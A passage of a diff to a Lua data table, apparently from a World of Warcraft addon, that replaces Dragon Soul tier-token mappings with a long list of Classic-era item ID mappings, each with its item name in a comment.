Chest of the Corrupted Vanquisher + -- Necropile Cuffs + ["228011"] = { + 14629, -- Necropile Cuffs }, - -- Deep Earth Robes - ["78755"] = { - 78862, -- Chest of the Corrupted Vanquisher + -- Bloodmail Hauberk + ["228012"] = { + 14611, -- Bloodmail Hauberk }, - -- Wyrmstalker's Tunic - ["78756"] = { - 78864, -- Chest of the Corrupted Protector + -- Necropile Robe + ["228013"] = { + 14626, -- Necropile Robe }, - -- Deep Earth Vestment - ["78757"] = { - 78862, -- Chest of the Corrupted Vanquisher + -- Bloodmail Belt + ["228014"] = { + 14614, -- Bloodmail Belt }, - -- Necrotic Boneplate Chestguard - ["78758"] = { - 78862, -- Chest of the Corrupted Vanquisher + -- Frightalon + ["228015"] = { + 14024, -- Frightalon }, - -- Blackfang Battleweave Tunic - ["78759"] = { - 78862, -- Chest of the Corrupted Vanquisher + -- Dimly Opalescent Ring + ["228016"] = { + 18684, -- Dimly Opalescent Ring }, - -- Deep Earth Raiment - ["78760"] = { - 78862, -- Chest of the Corrupted Vanquisher + -- Skullsmoke Pants + ["228017"] = { + 14577, -- Skullsmoke Pants }, - -- Spiritwalker's Gloves - ["78761"] = { - 78867, -- Gauntlets of the Corrupted Protector + -- Necropile Leggings + ["228018"] = { + 14632, -- Necropile Leggings }, - -- Spiritwalker's Grips - ["78762"] = { - 78867, -- Gauntlets of the Corrupted Protector + -- Heart of the Fiend + ["228019"] = { + 13960, -- Heart of the Fiend }, - -- Colossal Dragonplate Gauntlets - ["78763"] = { - 78867, -- Gauntlets of the Corrupted Protector + -- Bloodmail Gauntlets + ["228020"] = { + 14615, -- Bloodmail Gauntlets }, - -- Colossal Dragonplate Handguards - ["78764"] = { - 78867, -- Gauntlets of the Corrupted Protector + -- Witchblade + ["228021"] = { + 13964, -- Witchblade }, - -- Necrotic Boneplate Gauntlets - ["78765"] = { - 78865, -- Gauntlets of the Corrupted Vanquisher + -- Headmaster's Charge + ["228022"] = { + 13937, -- Headmaster's Charge }, - -- Time Lord's Gloves - ["78766"] = { - 78865, -- Gauntlets of the Corrupted Vanquisher + -- Alanna's Embrace + ["228023"] = { + 13314, -- Alanna's Embrace }, - -- Spiritwalker's Handwraps - ["78767"] = { - 78867, -- Gauntlets of the Corrupted Protector + -- Silent Fang + ["228024"] = { + 13953, -- Silent Fang }, - -- Gloves of Radiant Glory - ["78768"] = { - 78866, -- Gauntlets of the Corrupted Conqueror + -- Tombstone Breastplate + ["228025"] = { + 13944, -- Tombstone Breastplate }, - -- Wyrmstalker's Gloves - ["78769"] = { - 78867, -- Gauntlets of the Corrupted Protector + -- Iceblade Hacker + ["228027"] = { + 13952, -- Iceblade Hacker }, - -- Gauntlets of Radiant Glory - ["78770"] = { - 78866, -- Gauntlets of the Corrupted Conqueror + -- Blade of Necromancy + ["228028"] = { + 22332, -- Blade of Necromancy }, - -- Deep Earth Gloves - ["78771"] = { - 78865, -- Gauntlets of the Corrupted Vanquisher + -- Gravestone War Axe + ["228029"] = { + 13983, -- Gravestone War Axe }, - -- Handguards of Radiant Glory - ["78772"] = { - 78866, -- Gauntlets of the Corrupted Conqueror + -- Malicious Axe + ["228030"] = { + 18759, -- Malicious Axe }, - -- Necrotic Boneplate Handguards - ["78773"] = { - 78865, -- Gauntlets of the Corrupted Vanquisher + -- Darkshade Gloves + ["228031"] = { + 14543, -- Darkshade Gloves }, - -- Blackfang Battleweave Gloves - ["78774"] = { - 78865, -- Gauntlets of the Corrupted Vanquisher + -- Bone Ring Helm + ["228032"] = { + 14539, -- Bone Ring Helm }, - -- Deep Earth Handwraps - ["78775"] = { - 78865, -- Gauntlets of the Corrupted Vanquisher + -- Hammer of Divine Might + ["228033"] = { + 22333, -- Hammer of Divine Might }, - -- Gloves of the Faceless Shroud - ["78776"] = { - 78866, -- Gauntlets of the Corrupted Conqueror + -- Shivery Handwraps + ["228034"] = { + 18693, -- Shivery Handwraps }, - -- Gloves of Dying Light - ["78777"] = { - 78866, -- Gauntlets of the Corrupted Conqueror + -- Lord Blackwood's Buckler + ["228035"] = { + 23139, -- Lord Blackwood's Buckler }, - -- Handwraps of Dying Light - ["78778"] = { - 78866, -- Gauntlets of the Corrupted Conqueror + -- Death's Clutch + ["228036"] = { + 14503, -- Death's Clutch }, - -- Deep Earth Grips - ["78779"] = { - 78865, -- Gauntlets of the Corrupted Vanquisher + -- Rattlecage Buckler + ["228037"] = { + 14528, -- Rattlecage Buckler }, - -- Spiritwalker's Headpiece - ["78780"] = { - 78870, -- Crown of the Corrupted Protector + -- Ironweave Pants + ["228038"] = { + 22303, -- Ironweave Pants }, - -- Spiritwalker's Helmet - ["78781"] = { - 78870, -- Crown of the Corrupted Protector + -- Spellbound Tome + ["228039"] = { + 18695, -- Spellbound Tome }, - -- Necrotic Boneplate Helmet - ["78782"] = { - 78868, -- Crown of the Corrupted Vanquisher + -- Ghostloom Leggings + ["228040"] = { + 14545, -- Ghostloom Leggings }, - -- Colossal Dragonplate Helmet - ["78783"] = { - 78870, -- Crown of the Corrupted Protector + -- Wraithplate Leggings + ["228041"] = { + 18690, -- Wraithplate Leggings }, - -- Colossal Dragonplate Faceguard - ["78784"] = { - 78870, -- Crown of the Corrupted Protector + -- Detention Strap + ["228042"] = { + 13950, -- Detention Strap }, - -- Deep Earth Helm - ["78785"] = { - 78868, -- Crown of the Corrupted Vanquisher + -- Boots of the Shrieker + ["228043"] = { + 13398, -- Boots of the Shrieker }, - -- Spiritwalker's Faceguard - ["78786"] = { - 78870, -- Crown of the Corrupted Protector + -- Maelstrom Leggings + ["228044"] = { + 14522, -- Maelstrom Leggings }, - -- Headguard of Radiant Glory - ["78787"] = { - 78869, -- Crown of the Corrupted Conqueror + -- Necromantic Band + ["228045"] = { + 18760, -- Necromantic Band }, - -- Helmet of Radiant Glory - ["78788"] = { - 78869, -- Crown of the Corrupted Conqueror + -- Don Mauricio's Band of Domination + ["228046"] = { + 22433, -- Don Mauricio's Band of Domination }, - -- Deep Earth Headpiece - ["78789"] = { - 78868, -- Crown of the Corrupted Vanquisher + -- Amalgam's Band + ["228047"] = { + 22326, -- Amalgam's Band }, - -- Faceguard of Radiant Glory - ["78790"] = { - 78869, -- Crown of the Corrupted Conqueror + -- Libram of Divinity + ["228048"] = { + 23201, -- Libram of Divinity }, - -- Deep Earth Cover - ["78791"] = { - 78868, -- Crown of the Corrupted Vanquisher + -- Totem of Sustaining + ["228049"] = { + 23200, -- Totem of Sustaining }, - -- Necrotic Boneplate Faceguard - ["78792"] = { - 78868, -- Crown of the Corrupted Vanquisher + -- Satyr's Bow + ["228050"] = { + 18323, -- Satyr's Bow }, - -- Wyrmstalker's Headguard - ["78793"] = { - 78870, -- Crown of the Corrupted Protector + -- Quel'dorai Channeling Rod + ["228051"] = { + 18311, -- Quel'dorai Channeling Rod }, - -- Blackfang Battleweave Helmet - ["78794"] = { - 78868, -- Crown of the Corrupted Vanquisher + -- Waveslicer + ["228052"] = { + 18324, -- Waveslicer }, - -- Cowl of Dying Light - ["78795"] = { - 78869, -- Crown of the Corrupted Conqueror + -- Fervent Helm + ["228053"] = { + 18319, -- Fervent Helm + }, + -- Tempest Talisman + ["228054"] = { + 18317, -- Tempest Talisman }, - -- Time Lord's Hood - ["78796"] = { - 78868, -- Crown of the Corrupted Vanquisher + -- Energized Chestplate + ["228055"] = { + 18312, -- Energized Chestplate }, - -- Hood of the Faceless Shroud - ["78797"] = { - 78869, -- Crown of the Corrupted Conqueror + -- Fiendish Machete + ["228056"] = { + 18310, -- Fiendish Machete }, - -- Hood of Dying Light - ["78798"] = { - 78869, -- Crown of the Corrupted Conqueror + -- Ring of Demonic Potency + ["228057"] = { + 18315, -- Ring of Demonic Potency }, - -- Spiritwalker's Legguards - ["78799"] = { - 78873, -- Leggings of the Corrupted Protector + -- Bulky Iron Spaulders + ["228058"] = { + 18493, -- Bulky Iron Spaulders }, - -- Colossal Dragonplate Legguards - ["78800"] = { - 78873, -- Leggings of the Corrupted Protector + -- Denwatcher's Shoulders + ["228059"] = { + 18494, -- Denwatcher's Shoulders }, - -- Colossal Dragonplate Legplates - ["78801"] = { - 78873, -- Leggings of the Corrupted Protector + -- Heliotrope Cloak + ["228060"] = { + 18496, -- Heliotrope Cloak }, - -- Necrotic Boneplate Greaves - ["78802"] = { - 78871, -- Leggings of the Corrupted Vanquisher + -- Brightspark Gloves + ["228061"] = { + 18387, -- Brightspark Gloves }, - -- Blackfang Battleweave Legguards - ["78803"] = { - 78871, -- Leggings of the Corrupted Vanquisher + -- Insightful Hood + ["228062"] = { + 18490, -- Insightful Hood }, - -- Wyrmstalker's Legguards - ["78804"] = { - 78873, -- Leggings of the Corrupted Protector + -- Warpwood Binding + ["228063"] = { + 18393, -- Warpwood Binding }, - -- Deep Earth Legwraps - ["78805"] = { - 78871, -- Leggings of the Corrupted Vanquisher + -- Observer's Shield + ["228064"] = { + 18485, -- Observer's Shield }, - -- Spiritwalker's Kilt - ["78806"] = { - 78873, -- Leggings of the Corrupted Protector + -- Cyclone Spaulders + ["228065"] = { + 18528, -- Cyclone Spaulders }, - -- Legplates of Radiant Glory - ["78807"] = { - 78872, -- Leggings of the Corrupted Conqueror + -- Ironweave Gloves + ["228066"] = { + 22304, -- Ironweave Gloves }, - -- Deep Earth Legguards - ["78808"] = { - 78871, -- Leggings of the Corrupted Vanquisher + -- Elder Magus Pendant + ["228067"] = { + 18397, -- Elder Magus Pendant }, - -- Deep Earth Leggings - ["78809"] = { - 78871, -- Leggings of the Corrupted Vanquisher + -- Mugger's Belt + ["228068"] = { + 18505, -- Mugger's Belt }, - -- Legguards of Radiant Glory - ["78810"] = { - 78872, -- Leggings of the Corrupted Conqueror + -- Eldritch Reinforced Legplates + ["228069"] = { + 18380, -- Eldritch Reinforced Legplates }, - -- Necrotic Boneplate Legguards - ["78811"] = { - 78871, -- Leggings of the Corrupted Vanquisher + -- Ogre Forged Hauberk + ["228070"] = { + 18530, -- Ogre Forged Hauberk }, - -- Greaves of Radiant Glory - ["78812"] = { - 78872, -- Leggings of the Corrupted Conqueror + -- Shadowflame Skull + ["228129"] = { + 228143, -- Shadowflame Sword }, - -- Spiritwalker's Legwraps - ["78813"] = { - 78873, -- Leggings of the Corrupted Protector + -- Shadowflame Sword + ["228143"] = { + 228129, -- Shadowflame Skull }, - -- Legwraps of Dying Light - ["78814"] = { - 78872, -- Leggings of the Corrupted Conqueror + -- Key to the City + ["228166"] = { + 12382, -- Key to the City }, - -- Time Lord's Leggings - ["78815"] = { - 78871, -- Leggings of the Corrupted Vanquisher + -- Robe of Volatile Power + ["228239"] = { + 19145, -- Robe of Volatile Power }, - -- Leggings of the Faceless Shroud - ["78816"] = { - 78872, -- Leggings of the Corrupted Conqueror + -- Flamewaker Legplates + ["228240"] = { + 18861, -- Flamewaker Legplates }, - -- Leggings of Dying Light - ["78817"] = { - 78872, -- Leggings of the Corrupted Conqueror + -- Heavy Dark Iron Ring + ["228242"] = { + 18879, -- Heavy Dark Iron Ring }, - -- Spiritwalker's Hauberk - ["78818"] = { - 78864, -- Chest of the Corrupted Protector + -- Ring of Spell Power + ["228243"] = { + 19147, -- Ring of Spell Power }, - -- Spiritwalker's Cuirass - ["78819"] = { - 78864, -- Chest of the Corrupted Protector + -- Manastorm Leggings + ["228244"] = { + 18872, -- Manastorm Leggings }, - -- Spiritwalker's Tunic - ["78820"] = { - 78864, -- Chest of the Corrupted Protector + -- Salamander Scale Pants + ["228245"] = { + 18875, -- Salamander Scale Pants }, - -- Breastplate of Radiant Glory - ["78821"] = { - 78863, -- Chest of the Corrupted Conqueror + -- Wristguards of Stability + ["228246"] = { + 19146, -- Wristguards of Stability }, - -- Battleplate of Radiant Glory - ["78822"] = { - 78863, -- Chest of the Corrupted Conqueror + -- Choker of Enlightenment + ["228247"] = { + 17109, -- Choker of Enlightenment }, - -- Robes of Dying Light - ["78823"] = { - 78863, -- Chest of the Corrupted Conqueror + -- Earthshaker + ["228248"] = { + 17073, -- Earthshaker }, - -- Time Lord's Robes - ["78824"] = { - 78862, -- Chest of the Corrupted Vanquisher + -- Medallion of Steadfast Might + ["228249"] = { + 17065, -- Medallion of Steadfast Might }, - -- Robes of the Faceless Shroud - ["78825"] = { - 78863, -- Chest of the Corrupted Conqueror + -- Striker's Mark + ["228252"] = { + 17069, -- Striker's Mark }, - -- Robes of Dying Light - ["78826"] = { - 78863, -- Chest of the Corrupted Conqueror + -- Sabatons of the Flamewalker + ["228253"] = { + 19144, -- Sabatons of the Flamewalker }, - -- Chestguard of Radiant Glory - ["78827"] = { - 78863, -- Chest of the Corrupted Conqueror + -- Magma Tempered Boots + ["228254"] = { + 18824, -- Magma Tempered Boots }, - -- Spiritwalker's Spaulders - ["78828"] = { - 78876, -- Shoulders of the Corrupted Protector + -- Talisman of Ephemeral Power + ["228255"] = { + 18820, -- Talisman of Ephemeral Power }, - -- Colossal Dragonplate Shoulderguards - ["78829"] = { - 78876, -- Shoulders of the Corrupted Protector + -- Mana Igniting Cord + ["228256"] = { + 19136, -- Mana Igniting Cord }, - -- Colossal Dragonplate Pauldrons - ["78830"] = { - 78876, -- Shoulders of the Corrupted Protector + -- Aged Core Leather Gloves + ["228257"] = { + 18823, -- Aged Core Leather Gloves }, - -- Necrotic Boneplate Pauldrons - ["78831"] = { - 78874, -- Shoulders of the Corrupted Vanquisher + -- Deep Earth Spaulders + ["228258"] = { + 18829, -- Deep Earth Spaulders }, - -- Wyrmstalker's Spaulders - ["78832"] = { - 78876, -- Shoulders of the Corrupted Protector + -- Fire Runed Grimoire + ["228259"] = { + 19142, -- Fire Runed Grimoire }, - -- Blackfang Battleweave Spaulders - ["78833"] = { - 78874, -- Shoulders of the Corrupted Vanquisher + -- Flameguard Gauntlets + ["228260"] = { + 19143, -- Flameguard Gauntlets }, - -- Spiritwalker's Mantle - ["78834"] = { - 78876, -- Shoulders of the Corrupted Protector + -- Quick Strike Ring + ["228261"] = { + 18821, -- Quick Strike Ring }, - -- Deep Earth Mantle - ["78835"] = { - 78874, -- Shoulders of the Corrupted Vanquisher + -- Crimson Shocker + ["228262"] = { + 17077, -- Crimson Shocker }, - -- Spiritwalker's Shoulderwraps - ["78836"] = { - 78876, -- Shoulders of the Corrupted Protector + -- Sorcerous Dagger + ["228263"] = { + 18878, -- Sorcerous Dagger }, - -- Pauldrons of Radiant Glory - ["78837"] = { - 78875, -- Shoulders of the Corrupted Conqueror + -- Brutality Blade + ["228265"] = { + 18832, -- Brutality Blade }, - -- Deep Earth Spaulders - ["78838"] = { - 78874, -- Shoulders of the Corrupted Vanquisher + -- Gutgore Ripper + ["228267"] = { + 17071, -- Gutgore Ripper }, - -- Deep Earth Shoulderwraps - ["78839"] = { - 78874, -- Shoulders of the Corrupted Vanquisher + -- Seal of the Archmagus + ["228268"] = { + 17110, -- Seal of the Archmagus }, - -- Shoulderguards of Radiant Glory - ["78840"] = { - 78875, -- Shoulders of the Corrupted Conqueror + -- Azuresong Mageblade + ["228269"] = { + 17103, -- Azuresong Mageblade }, - -- Mantle of Radiant Glory - ["78841"] = { - 78875, -- Shoulders of the Corrupted Conqueror + -- Blastershot Launcher + ["228270"] = { + 17072, -- Blastershot Launcher }, - -- Mantle of Dying Light - ["78842"] = { - 78875, -- Shoulders of the Corrupted Conqueror + -- Staff of Dominance + ["228271"] = { + 18842, -- Staff of Dominance }, - -- Time Lord's Mantle - ["78843"] = { - 78874, -- Shoulders of the Corrupted Vanquisher + -- Shadowstrike + ["228272"] = { + 17074, -- Shadowstrike }, - -- Mantle of the Faceless Shroud - ["78844"] = { - 78875, -- Shoulders of the Corrupted Conqueror + -- Thunderstrike + ["228273"] = { + 17223, -- Thunderstrike }, - -- Mantle of Dying Light - ["78845"] = { - 78875, -- Shoulders of the Corrupted Conqueror + -- Cauterizing Band + ["228274"] = { + 19140, -- Cauterizing Band }, - -- Necrotic Boneplate Shoulderguards - ["78846"] = { - 78874, -- Shoulders of the Corrupted Vanquisher + -- Core Forged Greaves + ["228275"] = { + 18806, -- Core Forged Greaves }, - -- Chest of the Corrupted Conqueror - ["78847"] = { - 78726, -- Breastplate of Radiant Glory - 78727, -- Battleplate of Radiant Glory - 78728, -- Robes of Dying Light - 78730, -- Robes of the Faceless Shroud - 78731, -- Robes of Dying Light - 78732, -- Chestguard of Radiant Glory + -- Core Hound Tooth + ["228277"] = { + 18805, -- Core Hound Tooth }, - -- Chest of the Corrupted Protector - ["78848"] = { - 78657, -- Colossal Dragonplate Battleplate - 78658, -- Colossal Dragonplate Chestguard - 78661, -- Wyrmstalker's Tunic - 78723, -- Spiritwalker's Hauberk - 78724, -- Spiritwalker's Cuirass - 78725, -- Spiritwalker's Tunic + -- Fireguard Shoulders + ["228279"] = { + 19139, -- Fireguard Shoulders }, - -- Chest of the Corrupted Vanquisher - ["78849"] = { - 78659, -- Necrotic Boneplate Breastplate - 78660, -- Deep Earth Robes - 78662, -- Deep Earth Vestment - 78663, -- Necrotic Boneplate Chestguard - 78664, -- Blackfang Battleweave Tunic - 78665, -- Deep Earth Raiment - 78729, -- Time Lord's Robes + -- Fireproof Cloak + ["228280"] = { + 18811, -- Fireproof Cloak }, - -- Crown of the Corrupted Conqueror - ["78850"] = { - 78692, -- Headguard of Radiant Glory - 78693, -- Helmet of Radiant Glory - 78695, -- Faceguard of Radiant Glory - 78700, -- Cowl of Dying Light - 78702, -- Hood of the Faceless Shroud - 78703, -- Hood of Dying Light + -- Gloves of the Hypnotic Flame + ["228281"] = { + 18808, -- Gloves of the Hypnotic Flame }, - -- Crown of the Corrupted Protector - ["78851"] = { - 78685, -- Spiritwalker's Headpiece - 78686, -- Spiritwalker's Helmet - 78688, -- Colossal Dragonplate Helmet - 78689, -- Colossal Dragonplate Faceguard - 78691, -- Spiritwalker's Faceguard - 78698, -- Wyrmstalker's Headguard + -- Sash of Whispered Secrets + ["228282"] = { + 18809, -- Sash of Whispered Secrets }, - -- Crown of the Corrupted Vanquisher - ["78852"] = { - 78687, -- Necrotic Boneplate Helmet - 78690, -- Deep Earth Helm - 78694, -- Deep Earth Headpiece - 78696, -- Deep Earth Cover - 78697, -- Necrotic Boneplate Faceguard - 78699, -- Blackfang Battleweave Helmet - 78701, -- Time Lord's Hood + -- Wild Growth Spaulders + ["228283"] = { + 18810, -- Wild Growth Spaulders }, - -- Gauntlets of the Corrupted Conqueror - ["78853"] = { - 78673, -- Gloves of Radiant Glory - 78675, -- Gauntlets of Radiant Glory - 78677, -- Handguards of Radiant Glory - 78681, -- Gloves of the Faceless Shroud - 78682, -- Gloves of Dying Light - 78683, -- Handwraps of Dying Light + -- Wristguards of True Flight + ["228284"] = { + 18812, -- Wristguards of True Flight }, - -- Gauntlets of the Corrupted Protector - ["78854"] = { - 78666, -- Spiritwalker's Gloves - 78667, -- Spiritwalker's Grips - 78668, -- Colossal Dragonplate Gauntlets - 78669, -- Colossal Dragonplate Handguards - 78672, -- Spiritwalker's Handwraps - 78674, -- Wyrmstalker's Gloves + -- Helm of the Lifegiver + ["228285"] = { + 18870, -- Helm of the Lifegiver }, - -- Gauntlets of the Corrupted Vanquisher - ["78855"] = { - 78670, -- Necrotic Boneplate Gauntlets - 78671, -- Time Lord's Gloves - 78676, -- Deep Earth Gloves - 78678, -- Necrotic Boneplate Handguards - 78679, -- Blackfang Battleweave Gloves - 78680, -- Deep Earth Handwraps - 78684, -- Deep Earth Grips + -- Band of Accuria + ["228286"] = { + 17063, -- Band of Accuria }, - -- Leggings of the Corrupted Conqueror - ["78856"] = { - 78712, -- Legplates of Radiant Glory - 78715, -- Legguards of Radiant Glory - 78717, -- Greaves of Radiant Glory - 78719, -- Legwraps of Dying Light - 78721, -- Leggings of the Faceless Shroud - 78722, -- Leggings of Dying Light + -- Band of Sulfuras + ["228287"] = { + 19138, -- Band of Sulfuras }, - -- Leggings of the Corrupted Protector - ["78857"] = { - 78704, -- Spiritwalker's Legguards - 78705, -- Colossal Dragonplate Legguards - 78706, -- Colossal Dragonplate Legplates - 78709, -- Wyrmstalker's Legguards - 78711, -- Spiritwalker's Kilt - 78718, -- Spiritwalker's Legwraps + -- Choker of the Fire Lord + ["228289"] = { + 18814, -- Choker of the Fire Lord }, - -- Leggings of the Corrupted Vanquisher - ["78858"] = { - 78707, -- Necrotic Boneplate Greaves - 78708, -- Blackfang Battleweave Legguards - 78710, -- Deep Earth Legwraps - 78713, -- Deep Earth Legguards - 78714, -- Deep Earth Leggings - 78716, -- Necrotic Boneplate Legguards - 78720, -- Time Lord's Leggings + -- Cloak of the Shrouded Mists + ["228290"] = { + 17102, -- Cloak of the Shrouded Mists + }, + -- Crown of Destruction + ["228291"] = { + 18817, -- Crown of Destruction + }, + -- Dragon's Blood Cape + ["228292"] = { + 17107, -- Dragon's Blood Cape }, - -- Shoulders of the Corrupted Conqueror - ["78859"] = { - 78742, -- Pauldrons of Radiant Glory - 78745, -- Shoulderguards of Radiant Glory - 78746, -- Mantle of Radiant Glory - 78747, -- Mantle of Dying Light - 78749, -- Mantle of the Faceless Shroud - 78750, -- Mantle of Dying Light + -- Essence of the Pure Flame + ["228293"] = { + 18815, -- Essence of the Pure Flame }, - -- Shoulders of the Corrupted Protector - ["78860"] = { - 78733, -- Spiritwalker's Spaulders - 78734, -- Colossal Dragonplate Shoulderguards - 78735, -- Colossal Dragonplate Pauldrons - 78737, -- Wyrmstalker's Spaulders - 78739, -- Spiritwalker's Mantle - 78741, -- Spiritwalker's Shoulderwraps + -- Malistar's Defender + ["228294"] = { + 17106, -- Malistar's Defender }, - -- Shoulders of the Corrupted Vanquisher - ["78861"] = { - 78736, -- Necrotic Boneplate Pauldrons - 78738, -- Blackfang Battleweave Spaulders - 78740, -- Deep Earth Mantle - 78743, -- Deep Earth Spaulders - 78744, -- Deep Earth Shoulderwraps - 78748, -- Time Lord's Mantle - 78751, -- Necrotic Boneplate Shoulderguards + -- Onslaught Girdle + ["228295"] = { + 19137, -- Onslaught Girdle }, - -- Chest of the Corrupted Vanquisher - ["78862"] = { - 78754, -- Necrotic Boneplate Breastplate - 78755, -- Deep Earth Robes - 78757, -- Deep Earth Vestment - 78758, -- Necrotic Boneplate Chestguard - 78759, -- Blackfang Battleweave Tunic - 78760, -- Deep Earth Raiment - 78824, -- Time Lord's Robes + -- Perdition's Blade + ["228296"] = { + 18816, -- Perdition's Blade }, - -- Chest of the Corrupted Conqueror - ["78863"] = { - 78821, -- Breastplate of Radiant Glory - 78822, -- Battleplate of Radiant Glory - 78823, -- Robes of Dying Light - 78825, -- Robes of the Faceless Shroud - 78826, -- Robes of Dying Light - 78827, -- Chestguard of Radiant Glory + -- Shard of the Flame + ["228297"] = { + 17082, -- Shard of the Flame }, - -- Chest of the Corrupted Protector - ["78864"] = { - 78752, -- Colossal Dragonplate Battleplate - 78753, -- Colossal Dragonplate Chestguard - 78756, -- Wyrmstalker's Tunic - 78818, -- Spiritwalker's Hauberk - 78819, -- Spiritwalker's Cuirass - 78820, -- Spiritwalker's Tunic + -- Shard of the Scale + ["228298"] = { + 17064, -- Shard of the Scale }, - -- Gauntlets of the Corrupted Vanquisher - ["78865"] = { - 78765, -- Necrotic Boneplate Gauntlets - 78766, -- Time Lord's Gloves - 78771, -- Deep Earth Gloves - 78773, -- Necrotic Boneplate Handguards - 78774, -- Blackfang Battleweave Gloves - 78775, -- Deep Earth Handwraps - 78779, -- Deep Earth Grips + -- Spinal Reaper + ["228299"] = { + 17104, -- Spinal Reaper }, - -- Gauntlets of the Corrupted Conqueror - ["78866"] = { - 78768, -- Gloves of Radiant Glory - 78770, -- Gauntlets of Radiant Glory - 78772, -- Handguards of Radiant Glory - 78776, -- Gloves of the Faceless Shroud - 78777, -- Gloves of Dying Light - 78778, -- Handwraps of Dying Light + -- Lok'delar, Stave of the Ancient Keepers + ["228332"] = { + 18715, -- Lok'delar, Stave of the Ancient Keepers }, - -- Gauntlets of the Corrupted Protector - ["78867"] = { - 78761, -- Spiritwalker's Gloves - 78762, -- Spiritwalker's Grips - 78763, -- Colossal Dragonplate Gauntlets - 78764, -- Colossal Dragonplate Handguards - 78767, -- Spiritwalker's Handwraps - 78769, -- Wyrmstalker's Gloves + -- Rhok'delar, Longbow of the Ancient Keepers + ["228334"] = { + 18713, -- Rhok'delar, Longbow of the Ancient Keepers }, - -- Crown of the Corrupted Vanquisher - ["78868"] = { - 78782, -- Necrotic Boneplate Helmet - 78785, -- Deep Earth Helm - 78789, -- Deep Earth Headpiece - 78791, -- Deep Earth Cover - 78792, -- Necrotic Boneplate Faceguard - 78794, -- Blackfang Battleweave Helmet - 78796, -- Time Lord's Hood + -- Benediction + ["228335"] = { + 18608, -- Benediction }, - -- Crown of the Corrupted Conqueror - ["78869"] = { - 78787, -- Headguard of Radiant Glory - 78788, -- Helmet of Radiant Glory - 78790, -- Faceguard of Radiant Glory - 78795, -- Cowl of Dying Light - 78797, -- Hood of the Faceless Shroud - 78798, -- Hood of Dying Light + -- Anathema + ["228336"] = { + 18609, -- Anathema }, - -- Crown of the Corrupted Protector - ["78870"] = { - 78780, -- Spiritwalker's Headpiece - 78781, -- Spiritwalker's Helmet - 78783, -- Colossal Dragonplate Helmet - 78784, -- Colossal Dragonplate Faceguard - 78786, -- Spiritwalker's Faceguard - 78793, -- Wyrmstalker's Headguard + -- Unmelting Ice Girdle + ["228340"] = { + 18547, -- Unmelting Ice Girdle + }, + -- Leggings of Arcane Supremacy + ["228345"] = { + 18545, -- Leggings of Arcane Supremacy + }, + -- Typhoon + ["228347"] = { + 18542, -- Typhoon + }, + -- Eskhandar's Left Claw + ["228349"] = { + 18202, -- Eskhandar's Left Claw + }, + -- Eskhandar's Right Claw + ["228350"] = { + 18203, -- Eskhandar's Right Claw + }, + -- Doomhide Gauntlets + ["228351"] = { + 18544, -- Doomhide Gauntlets + }, + -- Fel Infused Leggings + ["228352"] = { + 19133, -- Fel Infused Leggings + }, + -- Infernal Headcage + ["228353"] = { + 18546, -- Infernal Headcage + }, + -- Blazefury Medallion + ["228354"] = { + 17111, -- Blazefury Medallion + }, + -- Flayed Doomguard Belt + ["228355"] = { + 19134, -- Flayed Doomguard Belt + }, + -- Amberseal Keeper + ["228356"] = { + 17113, -- Amberseal Keeper + }, + -- Blacklight Bracer + ["228357"] = { + 19135, -- Blacklight Bracer + }, + -- Ring of Entropy + ["228359"] = { + 18543, -- Ring of Entropy + }, + -- Eskhandar's Pelt + ["228360"] = { + 18204, -- Eskhandar's Pelt + }, + -- Cold Snap + ["228381"] = { + 19130, -- Cold Snap + }, + -- Fang of the Mystics + ["228382"] = { + 17070, -- Fang of the Mystics + }, + -- Puissant Cape + ["228383"] = { + 18541, -- Puissant Cape + }, + -- Snowblind Shoes + ["228384"] = { + 19131, -- Snowblind Shoes + }, + -- Crystal Adorned Crown + ["228385"] = { + 19132, -- Crystal Adorned Crown + }, + -- Drape of Benediction + ["228389"] = { + 18208, -- Drape of Benediction + }, + -- Empyrean Demolisher + ["228397"] = { + 17112, -- Empyrean Demolisher + }, + -- Obsidian Edged Blade + ["228459"] = { + 18822, -- Obsidian Edged Blade + }, + -- Bonereaver's Edge + ["228461"] = { + 17076, -- Bonereaver's Edge + }, + -- Aurastone Hammer + ["228462"] = { + 17105, -- Aurastone Hammer + }, + -- Royal Seal of Eldre'Thalas + ["228467"] = { + 18465, -- Royal Seal of Eldre'Thalas + 18466, -- Royal Seal of Eldre'Thalas + 18467, -- Royal Seal of Eldre'Thalas + 18468, -- Royal Seal of Eldre'Thalas + 18469, -- Royal Seal of Eldre'Thalas + 18470, -- Royal Seal of Eldre'Thalas + 18471, -- Royal Seal of Eldre'Thalas + 18472, -- Royal Seal of Eldre'Thalas + 18473, -- Royal Seal of Eldre'Thalas + }, + -- Tanglemoss Leggings + ["228468"] = { + 18390, -- Tanglemoss Leggings + }, + -- Tarnished Elven Ring + ["228469"] = { + 18500, -- Tarnished Elven Ring + }, + -- Silvermoon Leggings + ["228470"] = { + 18378, -- Silvermoon Leggings + }, + -- Stoneshatter + ["228471"] = { + 18388, -- Stoneshatter + }, + -- Distracting Dagger + ["228472"] = { + 18392, -- Distracting Dagger + }, + -- Unyielding Maul + ["228473"] = { + 18531, -- Unyielding Maul + }, + -- Mindsurge Robe + ["228474"] = { + 18532, -- Mindsurge Robe + }, + -- Diabolic Mantle + ["228475"] = { + 18757, -- Diabolic Mantle + }, + -- Barbarous Blade + ["228478"] = { + 18520, -- Barbarous Blade + }, + -- Leggings of Destruction + ["228479"] = { + 18524, -- Leggings of Destruction + }, + -- Crown of the Ogre King + ["228480"] = { + 18526, -- Crown of the Ogre King + }, + -- Rod of the Ogre Magi + ["228484"] = { + 18534, -- Rod of the Ogre Magi + }, + -- Treant's Bane + ["228486"] = { + 18538, -- Treant's Bane + }, + -- Mask of the Unforgiven + ["228500"] = { + 13404, -- Mask of the Unforgiven + }, + -- Songbird Blouse + ["228501"] = { + 13378, -- Songbird Blouse + }, + -- Piccolo of the Flaming Fire + ["228502"] = { + 13379, -- Piccolo of the Flaming Fire + }, + -- Woollies of the Prancing Minstrel + ["228503"] = { + 13383, -- Woollies of the Prancing Minstrel + }, + -- Rainbow Girdle + ["228504"] = { + 13384, -- Rainbow Girdle + }, + -- Royal Tribunal Cloak + ["228505"] = { + 13376, -- Royal Tribunal Cloak + }, + -- Vambraces of the Sadist + ["228513"] = { + 13400, -- Vambraces of the Sadist + }, + -- Timmy's Galoshes + ["228514"] = { + 13402, -- Timmy's Galoshes + }, + -- Grimgore Noose + ["228515"] = { + 13403, -- Grimgore Noose + }, + -- Peacemaker + ["228516"] = { + 18725, -- Peacemaker + }, + -- Magistrate's Cuffs + ["228518"] = { + 18726, -- Magistrate's Cuffs }, - -- Leggings of the Corrupted Vanquisher - ["78871"] 